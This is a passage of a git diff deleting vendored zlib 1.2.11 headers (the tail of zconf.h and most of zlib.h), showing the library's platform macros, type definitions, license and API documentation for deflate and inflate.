-#  define zlibCompileFlags      z_zlibCompileFlags
-#  define zlibVersion           z_zlibVersion
-
-/* all zlib typedefs in zlib.h and zconf.h */
-#  define Byte                  z_Byte
-#  define Bytef                 z_Bytef
-#  define alloc_func            z_alloc_func
-#  define charf                 z_charf
-#  define free_func             z_free_func
-#  ifndef Z_SOLO
-#    define gzFile                z_gzFile
-#  endif
-#  define gz_header             z_gz_header
-#  define gz_headerp            z_gz_headerp
-#  define in_func               z_in_func
-#  define intf                  z_intf
-#  define out_func              z_out_func
-#  define uInt                  z_uInt
-#  define uIntf                 z_uIntf
-#  define uLong                 z_uLong
-#  define uLongf                z_uLongf
-#  define voidp                 z_voidp
-#  define voidpc                z_voidpc
-#  define voidpf                z_voidpf
-
-/* all zlib structs in zlib.h and zconf.h */
-#  define gz_header_s           z_gz_header_s
-#  define internal_state        z_internal_state
-
-#endif
-
-#if defined(__MSDOS__) && !defined(MSDOS)
-#  define MSDOS
-#endif
-#if (defined(OS_2) || defined(__OS2__)) && !defined(OS2)
-#  define OS2
-#endif
-#if defined(_WINDOWS) && !defined(WINDOWS)
-#  define WINDOWS
-#endif
-#if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__)
-#  ifndef WIN32
-#    define WIN32
-#  endif
-#endif
-#if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32)
-#  if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__)
-#    ifndef SYS16BIT
-#      define SYS16BIT
-#    endif
-#  endif
-#endif
-
-/*
- * Compile with -DMAXSEG_64K if the alloc function cannot allocate more
- * than 64k bytes at a time (needed on systems with 16-bit int).
- */
-#ifdef SYS16BIT
-#  define MAXSEG_64K
-#endif
-#ifdef MSDOS
-#  define UNALIGNED_OK
-#endif
-
-#ifdef __STDC_VERSION__
-#  ifndef STDC
-#    define STDC
-#  endif
-#  if __STDC_VERSION__ >= 199901L
-#    ifndef STDC99
-#      define STDC99
-#    endif
-#  endif
-#endif
-#if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus))
-#  define STDC
-#endif
-#if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__))
-#  define STDC
-#endif
-#if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32))
-#  define STDC
-#endif
-#if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__))
-#  define STDC
-#endif
-
-#if defined(__OS400__) && !defined(STDC)    /* iSeries (formerly AS/400). */
-#  define STDC
-#endif
-
-#ifndef STDC
-#  ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */
-#    define const       /* note: need a more gentle solution here */
-#  endif
-#endif
-
-#if defined(ZLIB_CONST) && !defined(z_const)
-#  define z_const const
-#else
-#  define z_const
-#endif
-
-#ifdef Z_SOLO
-   typedef unsigned long z_size_t;
-#else
-#  define z_longlong long long
-#  if defined(NO_SIZE_T)
-     typedef unsigned NO_SIZE_T z_size_t;
-#  elif defined(STDC)
-#    include <stddef.h>
-     typedef size_t z_size_t;
-#  else
-     typedef unsigned long z_size_t;
-#  endif
-#  undef z_longlong
-#endif
-
-/* Maximum value for memLevel in deflateInit2 */
-#ifndef MAX_MEM_LEVEL
-#  ifdef MAXSEG_64K
-#    define MAX_MEM_LEVEL 8
-#  else
-#    define MAX_MEM_LEVEL 9
-#  endif
-#endif
-
-/* Maximum value for windowBits in deflateInit2 and inflateInit2.
- * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files
- * created by gzip. (Files created by minigzip can still be extracted by
- * gzip.)
- */
-#ifndef MAX_WBITS
-#  define MAX_WBITS   15 /* 32K LZ77 window */
-#endif
-
-/* The memory requirements for deflate are (in bytes):
-            (1 << (windowBits+2)) +  (1 << (memLevel+9))
- that is: 128K for windowBits=15  +  128K for memLevel = 8  (default values)
- plus a few kilobytes for small objects. For example, if you want to reduce
- the default memory requirements from 256K to 128K, compile with
-     make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7"
- Of course this will generally degrade compression (there's no free lunch).
-
-   The memory requirements for inflate are (in bytes) 1 << windowBits
- that is, 32K for windowBits=15 (default value) plus about 7 kilobytes
- for small objects.
-*/
-
-                        /* Type declarations */
-
-#ifndef OF /* function prototypes */
-#  ifdef STDC
-#    define OF(args)  args
-#  else
-#    define OF(args)  ()
-#  endif
-#endif
-
-#ifndef Z_ARG /* function prototypes for stdarg */
-#  if defined(STDC) || defined(Z_HAVE_STDARG_H)
-#    define Z_ARG(args)  args
-#  else
-#    define Z_ARG(args)  ()
-#  endif
-#endif
-
-/* The following definitions for FAR are needed only for MSDOS mixed
- * model programming (small or medium model with some far allocations).
- * This was tested only with MSC; for other MSDOS compilers you may have
- * to define NO_MEMCPY in zutil.h.  If you don't need the mixed model,
- * just define FAR to be empty.
- */
-#ifdef SYS16BIT
-#  if defined(M_I86SM) || defined(M_I86MM)
-     /* MSC small or medium model */
-#    define SMALL_MEDIUM
-#    ifdef _MSC_VER
-#      define FAR _far
-#    else
-#      define FAR far
-#    endif
-#  endif
-#  if (defined(__SMALL__) || defined(__MEDIUM__))
-     /* Turbo C small or medium model */
-#    define SMALL_MEDIUM
-#    ifdef __BORLANDC__
-#      define FAR _far
-#    else
-#      define FAR far
-#    endif
-#  endif
-#endif
-
-#if defined(WINDOWS) || defined(WIN32)
-   /* If building or using zlib as a DLL, define ZLIB_DLL.
-    * This is not mandatory, but it offers a little performance increase.
-    */
-#  ifdef ZLIB_DLL
-#    if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500))
-#      ifdef ZLIB_INTERNAL
-#        define ZEXTERN extern __declspec(dllexport)
-#      else
-#        define ZEXTERN extern __declspec(dllimport)
-#      endif
-#    endif
-#  endif  /* ZLIB_DLL */
-   /* If building or using zlib with the WINAPI/WINAPIV calling convention,
-    * define ZLIB_WINAPI.
-    * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI.
-    */
-#  ifdef ZLIB_WINAPI
-#    ifdef FAR
-#      undef FAR
-#    endif
-#    include <windows.h>
-     /* No need for _export, use ZLIB.DEF instead. */
-     /* For complete Windows compatibility, use WINAPI, not __stdcall. */
-#    define ZEXPORT WINAPI
-#    ifdef WIN32
-#      define ZEXPORTVA WINAPIV
-#    else
-#      define ZEXPORTVA FAR CDECL
-#    endif
-#  endif
-#endif
-
-#if defined (__BEOS__)
-#  ifdef ZLIB_DLL
-#    ifdef ZLIB_INTERNAL
-#      define ZEXPORT   __declspec(dllexport)
-#      define ZEXPORTVA __declspec(dllexport)
-#    else
-#      define ZEXPORT   __declspec(dllimport)
-#      define ZEXPORTVA __declspec(dllimport)
-#    endif
-#  endif
-#endif
-
-#ifndef ZEXTERN
-#  define ZEXTERN extern
-#endif
-#ifndef ZEXPORT
-#  define ZEXPORT
-#endif
-#ifndef ZEXPORTVA
-#  define ZEXPORTVA
-#endif
-
-#ifndef FAR
-#  define FAR
-#endif
-
-#if !defined(__MACTYPES__)
-typedef unsigned char  Byte;  /* 8 bits */
-#endif
-typedef unsigned int   uInt;  /* 16 bits or more */
-typedef unsigned long  uLong; /* 32 bits or more */
-
-#ifdef SMALL_MEDIUM
-   /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */
-#  define Bytef Byte FAR
-#else
-   typedef Byte  FAR Bytef;
-#endif
-typedef char  FAR charf;
-typedef int   FAR intf;
-typedef uInt  FAR uIntf;
-typedef uLong FAR uLongf;
-
-#ifdef STDC
-   typedef void const *voidpc;
-   typedef void FAR   *voidpf;
-   typedef void       *voidp;
-#else
-   typedef Byte const *voidpc;
-   typedef Byte FAR   *voidpf;
-   typedef Byte       *voidp;
-#endif
-
-#if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC)
-#  include <limits.h>
-#  if (UINT_MAX == 0xffffffffUL)
-#    define Z_U4 unsigned
-#  elif (ULONG_MAX == 0xffffffffUL)
-#    define Z_U4 unsigned long
-#  elif (USHRT_MAX == 0xffffffffUL)
-#    define Z_U4 unsigned short
-#  endif
-#endif
-
-#ifdef Z_U4
-   typedef Z_U4 z_crc_t;
-#else
-   typedef unsigned long z_crc_t;
-#endif
-
-#ifdef HAVE_UNISTD_H    /* may be set to #if 1 by ./configure */
-#  define Z_HAVE_UNISTD_H
-#endif
-
-#ifdef HAVE_STDARG_H    /* may be set to #if 1 by ./configure */
-#  define Z_HAVE_STDARG_H
-#endif
-
-#ifdef STDC
-#  ifndef Z_SOLO
-#    include <sys/types.h>      /* for off_t */
-#  endif
-#endif
-
-#if defined(STDC) || defined(Z_HAVE_STDARG_H)
-#  ifndef Z_SOLO
-#    include <stdarg.h>         /* for va_list */
-#  endif
-#endif
-
-#ifdef _WIN32
-#  ifndef Z_SOLO
-#    include <stddef.h>         /* for wchar_t */
-#  endif
-#endif
-
-/* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and
- * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even
- * though the former does not conform to the LFS document), but considering
- * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as
- * equivalently requesting no 64-bit operations
- */
-#if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1
-#  undef _LARGEFILE64_SOURCE
-#endif
-
-#if defined(__WATCOMC__) && !defined(Z_HAVE_UNISTD_H)
-#  define Z_HAVE_UNISTD_H
-#endif
-#ifndef Z_SOLO
-#  if defined(Z_HAVE_UNISTD_H) || defined(_LARGEFILE64_SOURCE)
-//#    include <unistd.h>         /* for SEEK_*, off_t, and _LFS64_LARGEFILE */
-#    ifdef VMS
-#      include <unixio.h>       /* for off_t */
-#    endif
-#    ifndef z_off_t
-#      define z_off_t off_t
-#    endif
-#  endif
-#endif
-
-#if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0
-#  define Z_LFS64
-#endif
-
-#if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64)
-#  define Z_LARGE64
-#endif
-
-#if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64)
-#  define Z_WANT64
-#endif
-
-#if !defined(SEEK_SET) && !defined(Z_SOLO)
-#  define SEEK_SET        0       /* Seek from beginning of file.  */
-#  define SEEK_CUR        1       /* Seek from current position.  */
-#  define SEEK_END        2       /* Set file pointer to EOF plus "offset" */
-#endif
-
-#ifndef z_off_t
-#  define z_off_t long
-#endif
-
-#if !defined(_WIN32) && defined(Z_LARGE64)
-#  define z_off64_t off64_t
-#else
-#  if defined(_WIN32) && !defined(__GNUC__) && !defined(Z_SOLO)
-#    define z_off64_t __int64
-#  else
-#    define z_off64_t z_off_t
-#  endif
-#endif
-
-/* MVS linker does not support external names larger than 8 bytes */
-#if defined(__MVS__)
-  #pragma map(deflateInit_,"DEIN")
-  #pragma map(deflateInit2_,"DEIN2")
-  #pragma map(deflateEnd,"DEEND")
-  #pragma map(deflateBound,"DEBND")
-  #pragma map(inflateInit_,"ININ")
-  #pragma map(inflateInit2_,"ININ2")
-  #pragma map(inflateEnd,"INEND")
-  #pragma map(inflateSync,"INSY")
-  #pragma map(inflateSetDictionary,"INSEDI")
-  #pragma map(compressBound,"CMBND")
-  #pragma map(inflate_table,"INTABL")
-  #pragma map(inflate_fast,"INFA")
-  #pragma map(inflate_copyright,"INCOPY")
-#endif
-
-#endif /* ZCONF_H */
diff --git a/thirdparty/zlib/include/zlib.h b/thirdparty/zlib/include/zlib.h
deleted file mode 100644
index f09cdaf..0000000
--- a/thirdparty/zlib/include/zlib.h
+++ /dev/null
@@ -1,1912 +0,0 @@
-/* zlib.h -- interface of the 'zlib' general purpose compression library
-  version 1.2.11, January 15th, 2017
-
-  Copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler
-
-  This software is provided 'as-is', without any express or implied
-  warranty.  In no event will the authors be held liable for any damages
-  arising from the use of this software.
-
-  Permission is granted to anyone to use this software for any purpose,
-  including commercial applications, and to alter it and redistribute it
-  freely, subject to the following restrictions:
-
-  1. The origin of this software must not be misrepresented; you must not
-     claim that you wrote the original software. If you use this software
-     in a product, an acknowledgment in the product documentation would be
-     appreciated but is not required.
-  2. Altered source versions must be plainly marked as such, and must not be
-     misrepresented as being the original software.
-  3. This notice may not be removed or altered from any source distribution.
-
-  Jean-loup Gailly        Mark Adler
-  jloup@gzip.org          madler@alumni.caltech.edu
-
-
-  The data format used by the zlib library is described by RFCs (Request for
-  Comments) 1950 to 1952 in the files http://tools.ietf.org/html/rfc1950
-  (zlib format), rfc1951 (deflate format) and rfc1952 (gzip format).
-*/
-
-#ifndef ZLIB_H
-#define ZLIB_H
-
-#include "zconf.h"
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#define ZLIB_VERSION "1.2.11"
-#define ZLIB_VERNUM 0x12b0
-#define ZLIB_VER_MAJOR 1
-#define ZLIB_VER_MINOR 2
-#define ZLIB_VER_REVISION 11
-#define ZLIB_VER_SUBREVISION 0
-
-/*
-    The 'zlib' compression library provides in-memory compression and
-  decompression functions, including integrity checks of the uncompressed data.
-  This version of the library supports only one compression method (deflation)
-  but other algorithms will be added later and will have the same stream
-  interface.
-
-    Compression can be done in a single step if the buffers are large enough,
-  or can be done by repeated calls of the compression function.  In the latter
-  case, the application must provide more input and/or consume the output
-  (providing more output space) before each call.
-
-    The compressed data format used by default by the in-memory functions is
-  the zlib format, which is a zlib wrapper documented in RFC 1950, wrapped
-  around a deflate stream, which is itself documented in RFC 1951.
-
-    The library also supports reading and writing files in gzip (.gz) format
-  with an interface similar to that of stdio using the functions that start
-  with "gz".  The gzip format is different from the zlib format.  gzip is a
-  gzip wrapper, documented in RFC 1952, wrapped around a deflate stream.
-
-    This library can optionally read and write gzip and raw deflate streams in
-  memory as well.
-
-    The zlib format was designed to be compact and fast for use in memory
-  and on communications channels.  The gzip format was designed for single-
-  file compression on file systems, has a larger header than zlib to maintain
-  directory information, and uses a different, slower check method than zlib.
-
-    The library does not install any signal handler.  The decoder checks
-  the consistency of the compressed data, so the library should never crash
-  even in the case of corrupted input.
-*/
-
-typedef voidpf (*alloc_func) OF((voidpf opaque, uInt items, uInt size));
-typedef void   (*free_func)  OF((voidpf opaque, voidpf address));
-
-struct internal_state;
-
-typedef struct z_stream_s {
-    z_const Bytef *next_in;     /* next input byte */
-    uInt     avail_in;  /* number of bytes available at next_in */
-    uLong    total_in;  /* total number of input bytes read so far */
-
-    Bytef    *next_out; /* next output byte will go here */
-    uInt     avail_out; /* remaining free space at next_out */
-    uLong    total_out; /* total number of bytes output so far */
-
-    z_const char *msg;  /* last error message, NULL if no error */
-    struct internal_state FAR *state; /* not visible by applications */
-
-    alloc_func zalloc;  /* used to allocate the internal state */
-    free_func  zfree;   /* used to free the internal state */
-    voidpf     opaque;  /* private data object passed to zalloc and zfree */
-
-    int     data_type;  /* best guess about the data type: binary or text
-                           for deflate, or the decoding state for inflate */
-    uLong   adler;      /* Adler-32 or CRC-32 value of the uncompressed data */
-    uLong   reserved;   /* reserved for future use */
-} z_stream;
-
-typedef z_stream FAR *z_streamp;
-
-/*
-     gzip header information passed to and from zlib routines.  See RFC 1952
-  for more details on the meanings of these fields.
-*/
-typedef struct gz_header_s {
-    int     text;       /* true if compressed data believed to be text */
-    uLong   time;       /* modification time */
-    int     xflags;     /* extra flags (not used when writing a gzip file) */
-    int     os;         /* operating system */
-    Bytef   *extra;     /* pointer to extra field or Z_NULL if none */
-    uInt    extra_len;  /* extra field length (valid if extra != Z_NULL) */
-    uInt    extra_max;  /* space at extra (only when reading header) */
-    Bytef   *name;      /* pointer to zero-terminated file name or Z_NULL */
-    uInt    name_max;   /* space at name (only when reading header) */
-    Bytef   *comment;   /* pointer to zero-terminated comment or Z_NULL */
-    uInt    comm_max;   /* space at comment (only when reading header) */
-    int     hcrc;       /* true if there was or will be a header crc */
-    int     done;       /* true when done reading gzip header (not used
-                           when writing a gzip file) */
-} gz_header;
-
-typedef gz_header FAR *gz_headerp;
-
-/*
-     The application must update next_in and avail_in when avail_in has dropped
-   to zero.  It must update next_out and avail_out when avail_out has dropped
-   to zero.  The application must initialize zalloc, zfree and opaque before
-   calling the init function.  All other fields are set by the compression
-   library and must not be updated by the application.
-
-     The opaque value provided by the application will be passed as the first
-   parameter for calls of zalloc and zfree.  This can be useful for custom
-   memory management.  The compression library attaches no meaning to the
-   opaque value.
-
-     zalloc must return Z_NULL if there is not enough memory for the object.
-   If zlib is used in a multi-threaded application, zalloc and zfree must be
-   thread safe.  In that case, zlib is thread-safe.  When zalloc and zfree are
-   Z_NULL on entry to the initialization function, they are set to internal
-   routines that use the standard library functions malloc() and free().
-
-     On 16-bit systems, the functions zalloc and zfree must be able to allocate
-   exactly 65536 bytes, but will not be required to allocate more than this if
-   the symbol MAXSEG_64K is defined (see zconf.h).  WARNING: On MSDOS, pointers
-   returned by zalloc for objects of exactly 65536 bytes *must* have their
-   offset normalized to zero.  The default allocation function provided by this
-   library ensures this (see zutil.c).  To reduce memory requirements and avoid
-   any allocation of 64K objects, at the expense of compression ratio, compile
-   the library with -DMAX_WBITS=14 (see zconf.h).
-
-     The fields total_in and total_out can be used for statistics or progress
-   reports.  After compression, total_in holds the total size of the
-   uncompressed data and may be saved for use by the decompressor (particularly
-   if the decompressor wants to decompress everything in a single step).
-*/
-
-                        /* constants */
-
-#define Z_NO_FLUSH      0
-#define Z_PARTIAL_FLUSH 1
-#define Z_SYNC_FLUSH    2
-#define Z_FULL_FLUSH    3
-#define Z_FINISH        4
-#define Z_BLOCK         5
-#define Z_TREES         6
-/* Allowed flush values; see deflate() and inflate() below for details */
-
-#define Z_OK            0
-#define Z_STREAM_END    1
-#define Z_NEED_DICT     2
-#define Z_ERRNO        (-1)
-#define Z_STREAM_ERROR (-2)
-#define Z_DATA_ERROR   (-3)
-#define Z_MEM_ERROR    (-4)
-#define Z_BUF_ERROR    (-5)
-#define Z_VERSION_ERROR (-6)
-/* Return codes for the compression/decompression functions. Negative values
- * are errors, positive values are used for special but normal events.
- */
-
-#define Z_NO_COMPRESSION         0
-#define Z_BEST_SPEED             1
-#define Z_BEST_COMPRESSION       9
-#define Z_DEFAULT_COMPRESSION  (-1)
-/* compression levels */
-
-#define Z_FILTERED            1
-#define Z_HUFFMAN_ONLY        2
-#define Z_RLE                 3
-#define Z_FIXED               4
-#define Z_DEFAULT_STRATEGY    0
-/* compression strategy; see deflateInit2() below for details */
-
-#define Z_BINARY   0
-#define Z_TEXT     1
-#define Z_ASCII    Z_TEXT   /* for compatibility with 1.2.2 and earlier */
-#define Z_UNKNOWN  2
-/* Possible values of the data_type field for deflate() */
-
-#define Z_DEFLATED   8
-/* The deflate compression method (the only one supported in this version) */
-
-#define Z_NULL  0  /* for initializing zalloc, zfree, opaque */
-
-#define zlib_version zlibVersion()
-/* for compatibility with versions < 1.0.2 */
-
-
-                        /* basic functions */
-
-ZEXTERN const char * ZEXPORT zlibVersion OF((void));
-/* The application can compare zlibVersion and ZLIB_VERSION for consistency.
-   If the first character differs, the library code actually used is not
-   compatible with the zlib.h header file used by the application.  This check
-   is automatically made by deflateInit and inflateInit.
- */
-
-/*
-ZEXTERN int ZEXPORT deflateInit OF((z_streamp strm, int level));
-
-     Initializes the internal stream state for compression.  The fields
-   zalloc, zfree and opaque must be initialized before by the caller.  If
-   zalloc and zfree are set to Z_NULL, deflateInit updates them to use default
-   allocation functions.
-
-     The compression level must be Z_DEFAULT_COMPRESSION, or between 0 and 9:
-   1 gives best speed, 9 gives best compression, 0 gives no compression at all
-   (the input data is simply copied a block at a time).  Z_DEFAULT_COMPRESSION
-   requests a default compromise between speed and compression (currently
-   equivalent to level 6).
-
-     deflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_STREAM_ERROR if level is not a valid compression level, or
-   Z_VERSION_ERROR if the zlib library version (zlib_version) is incompatible
-   with the version assumed by the caller (ZLIB_VERSION).  msg is set to null
-   if there is no error message.  deflateInit does not perform any compression:
-   this will be done by deflate().
-*/
-
-
-ZEXTERN int ZEXPORT deflate OF((z_streamp strm, int flush));
-/*
-    deflate compresses as much data as possible, and stops when the input
-  buffer becomes empty or the output buffer becomes full.  It may introduce
-  some output latency (reading input without producing any output) except when
-  forced to flush.
-
-    The detailed semantics are as follows.  deflate performs one or both of the
-  following actions:
-
-  - Compress more input starting at next_in and update next_in and avail_in
-    accordingly.  If not all input can be processed (because there is not
-    enough room in the output buffer), next_in and avail_in are updated and
-    processing will resume at this point for the next call of deflate().
-
-  - Generate more output starting at next_out and update next_out and avail_out
-    accordingly.  This action is forced if the parameter flush is non zero.
-    Forcing flush frequently degrades the compression ratio, so this parameter
-    should be set only when necessary.  Some output may be provided even if
-    flush is zero.
-
-    Before the call of deflate(), the application should ensure that at least
-  one of the actions is possible, by providing more input and/or consuming more
-  output, and updating avail_in or avail_out accordingly; avail_out should
-  never be zero before the call.  The application can consume the compressed
-  output when it wants, for example when the output buffer is full (avail_out
-  == 0), or after each call of deflate().  If deflate returns Z_OK and with
-  zero avail_out, it must be called again after making room in the output
-  buffer because there might be more output pending. See deflatePending(),
-  which can be used if desired to determine whether or not there is more ouput
-  in that case.
-
-    Normally the parameter flush is set to Z_NO_FLUSH, which allows deflate to
-  decide how much data to accumulate before producing output, in order to
-  maximize compression.
-
-    If the parameter flush is set to Z_SYNC_FLUSH, all pending output is
-  flushed to the output buffer and the output is aligned on a byte boundary, so
-  that the decompressor can get all input data available so far.  (In
-  particular avail_in is zero after the call if enough output space has been
-  provided before the call.) Flushing may degrade compression for some
-  compression algorithms and so it should be used only when necessary.  This
-  completes the current deflate block and follows it with an empty stored block
-  that is three bits plus filler bits to the next byte, followed by four bytes
-  (00 00 ff ff).
-
-    If flush is set to Z_PARTIAL_FLUSH, all pending output is flushed to the
-  output buffer, but the output is not aligned to a byte boundary.  All of the
-  input data so far will be available to the decompressor, as for Z_SYNC_FLUSH.
-  This completes the current deflate block and follows it with an empty fixed
-  codes block that is 10 bits long.  This assures that enough bytes are output
-  in order for the decompressor to finish the block before the empty fixed
-  codes block.
-
-    If flush is set to Z_BLOCK, a deflate block is completed and emitted, as
-  for Z_SYNC_FLUSH, but the output is not aligned on a byte boundary, and up to
-  seven bits of the current block are held to be written as the next byte after
-  the next deflate block is completed.  In this case, the decompressor may not
-  be provided enough bits at this point in order to complete decompression of
-  the data provided so far to the compressor.  It may need to wait for the next
-  block to be emitted.  This is for advanced applications that need to control
-  the emission of deflate blocks.
-
-    If flush is set to Z_FULL_FLUSH, all output is flushed as with
-  Z_SYNC_FLUSH, and the compression state is reset so that decompression can
-  restart from this point if previous compressed data has been damaged or if
-  random access is desired.  Using Z_FULL_FLUSH too often can seriously degrade
-  compression.
-
-    If deflate returns with avail_out == 0, this function must be called again
-  with the same value of the flush parameter and more output space (updated
-  avail_out), until the flush is complete (deflate returns with non-zero
-  avail_out).  In the case of a Z_FULL_FLUSH or Z_SYNC_FLUSH, make sure that
-  avail_out is greater than six to avoid repeated flush markers due to
-  avail_out == 0 on return.
-
-    If the parameter flush is set to Z_FINISH, pending input is processed,
-  pending output is flushed and deflate returns with Z_STREAM_END if there was
-  enough output space.  If deflate returns with Z_OK or Z_BUF_ERROR, this
-  function must be called again with Z_FINISH and more output space (updated
-  avail_out) but no more input data, until it returns with Z_STREAM_END or an
-  error.  After deflate has returned Z_STREAM_END, the only possible operations
-  on the stream are deflateReset or deflateEnd.
-
-    Z_FINISH can be used in the first deflate call after deflateInit if all the
-  compression is to be done in a single step.  In order to complete in one
-  call, avail_out must be at least the value returned by deflateBound (see
-  below).  Then deflate is guaranteed to return Z_STREAM_END.  If not enough
-  output space is provided, deflate will not return Z_STREAM_END, and it must
-  be called again as described above.
-
-    deflate() sets strm->adler to the Adler-32 checksum of all input read
-  so far (that is, total_in bytes).  If a gzip stream is being generated, then
-  strm->adler will be the CRC-32 checksum of the input read so far.  (See
-  deflateInit2 below.)
-
-    deflate() may update strm->data_type if it can make a good guess about
-  the input data type (Z_BINARY or Z_TEXT).  If in doubt, the data is
-  considered binary.  This field is only for information purposes and does not
-  affect the compression algorithm in any manner.
-
-    deflate() returns Z_OK if some progress has been made (more input
-  processed or more output produced), Z_STREAM_END if all input has been
-  consumed and all output has been produced (only when flush is set to
-  Z_FINISH), Z_STREAM_ERROR if the stream state was inconsistent (for example
-  if next_in or next_out was Z_NULL or the state was inadvertently written over
-  by the application), or Z_BUF_ERROR if no progress is possible (for example
-  avail_in or avail_out was zero).  Note that Z_BUF_ERROR is not fatal, and
-  deflate() can be called again with more input and more output space to
-  continue compressing.
-*/
-
-
-ZEXTERN int ZEXPORT deflateEnd OF((z_streamp strm));
-/*
-     All dynamically allocated data structures for this stream are freed.
-   This function discards any unprocessed input and does not flush any pending
-   output.
-
-     deflateEnd returns Z_OK if success, Z_STREAM_ERROR if the
-   stream state was inconsistent, Z_DATA_ERROR if the stream was freed
-   prematurely (some input or output was discarded).  In the error case, msg
-   may be set but then points to a static string (which must not be
-   deallocated).
-*/
-
-
-/*
-ZEXTERN int ZEXPORT inflateInit OF((z_streamp strm));
-
-     Initializes the internal stream state for decompression.  The fields
-   next_in, avail_in, zalloc, zfree and opaque must be initialized before by
-   the caller.  In the current version of inflate, the provided input is not
-   read or consumed.  The allocation of a sliding window will be deferred to
-   the first call of inflate (if the decompression does not complete on the
-   first call).  If zalloc and zfree are set to Z_NULL, inflateInit updates
-   them to use default allocation functions.
-
-     inflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_VERSION_ERROR if the zlib library version is incompatible with the
-   version assumed by the caller, or Z_STREAM_ERROR if the parameters are
-   invalid, such as a null pointer to the structure.  msg is set to null if
-   there is no error message.  inflateInit does not perform any decompression.
-   Actual decompression will be done by inflate().  So next_in, and avail_in,
-   next_out, and avail_out are unused and unchanged.  The current
-   implementation of inflateInit() does not process any header information --
-   that is deferred until inflate() is called.
-*/
-
-
-ZEXTERN int ZEXPORT inflate OF((z_streamp strm, int flush));
-/*
-    inflate decompresses as much data as possible, and stops when the input
-  buffer becomes empty or the output buffer becomes full.  It may introduce
-  some output latency (reading input without producing any output) except when
-  forced to flush.
-
-  The detailed semantics are as follows.  inflate performs one or both of the
-  following actions:
-
-  - Decompress more input starting at next_in and update next_in and avail_in
-    accordingly.  If not all input can be processed (because there is not
-    enough room in the output buffer), then next_in and avail_in are updated
-    accordingly, and processing will resume at this point for the next call of
-    inflate().
-
-  - Generate more output starting at next_out and update next_out and avail_out
-    accordingly.  inflate() provides as much output as possible, until there is
-    no more input data or no more space in the output buffer (see below about
-    the flush parameter).
-
-    Before the call of inflate(), the application should ensure that at least
-  one of the actions is possible, by providing more input and/or consuming more
-  output, and updating the next_* and avail_* values accordingly.  If the
-  caller of inflate() does not provide both available input and available
-  output space, it is possible that there will be no progress made.  The
-  application can consume the uncompressed output when it wants, for example
-  when the output buffer is full (avail_out == 0), or after each call of
-  inflate().  If inflate returns Z_OK and with zero avail_out, it must be
-  called again after making room in the output buffer because there might be
-  more output pending.
-
-    The flush parameter of inflate() can be Z_NO_FLUSH, Z_SYNC_FLUSH, Z_FINISH,
-  Z_BLOCK, or Z_TREES.  Z_SYNC_FLUSH requests that inflate() flush as much
-  output as possible to the output buffer.  Z_BLOCK requests that inflate()
-  stop if and when it gets to the next deflate block boundary.  When decoding
-  the zlib or gzip format, this will cause inflate() to return immediately
-  after the header and before the first block.  When doing a raw inflate,
-  inflate() will go ahead and process the first block, and will return when it
-  gets to the end of that block, or when it runs out of data.
-
-    The Z_BLOCK option assists in appending to or combining deflate streams.
-  To assist in this, on return inflate() always sets strm->data_type to the
-  number of unused bits in the last byte taken from strm->next_in, plus 64 if
-  inflate() is currently decoding the last block in the deflate stream, plus
-  128 if inflate() returned immediately after decoding an end-of-block code or
-  decoding the complete header up to just before the first byte of the deflate
-  stream.  The end-of-block will not be indicated until all of the uncompressed
-  data from that block has been written to strm->next_out.  The number of
-  unused bits may in general be greater than seven, except when bit 7 of
-  data_type is set, in which case the number of unused bits will be less than
-  eight.  data_type is set as noted here every time inflate() returns for all
-  flush options, and so can be used to determine the amount of currently
-  consumed input in bits.
-
-    The Z_TREES option behaves as Z_BLOCK does, but it also returns when the
-  end of each deflate block header is reached, before any actual data in that
-  block is decoded.  This allows the caller to determine the length of the
-  deflate block header for later use in random access within a deflate block.
-  256 is added to the value of strm->data_type when inflate() returns
-  immediately after reaching the end of the deflate block header.
-
-    inflate() should normally be called until it returns Z_STREAM_END or an
-  error.  However if all decompression is to be performed in a single step (a
-  single call of inflate), the parameter flush should be set to Z_FINISH.  In
-  this case all pending input is processed and all pending output is flushed;
-  avail_out must be large enough to hold all of the uncompressed data for the
-  operation to complete.  (The size of the uncompressed data may have been
-  saved by the compressor for this purpose.)  The use of Z_FINISH is not
-  required to perform an inflation in one step.  However it may be used to
-  inform inflate that a faster approach can be used for the single inflate()
-  call.  Z_FINISH also informs inflate to not maintain a sliding window if the
-  stream completes, which reduces inflate's memory footprint.  If the stream
-  does not complete, either because not all of the stream is provided or not
-  enough output space is provided, then a sliding window will be allocated and
-  inflate() can be called again to continue the operation as if Z_NO_FLUSH had
-  been used.
-
-     In this implementation, inflate() always flushes as much output as
-  possible to the output buffer, and always uses the faster approach on the
-  first call.  So the effects of the flush parameter in this implementation are
-  on the return value of inflate() as noted below, when inflate() returns early
-  when Z_BLOCK or Z_TREES is used, and when inflate() avoids the allocation of
-  memory for a sliding window when Z_FINISH is used.
-
-     If a preset dictionary is needed after this call (see inflateSetDictionary
-  below), inflate sets strm->adler to the Adler-32 checksum of the dictionary
-  chosen by the compressor and returns Z_NEED_DICT; otherwise it sets
-  strm->adler to the Adler-32 checksum of all output produced so far (that is,
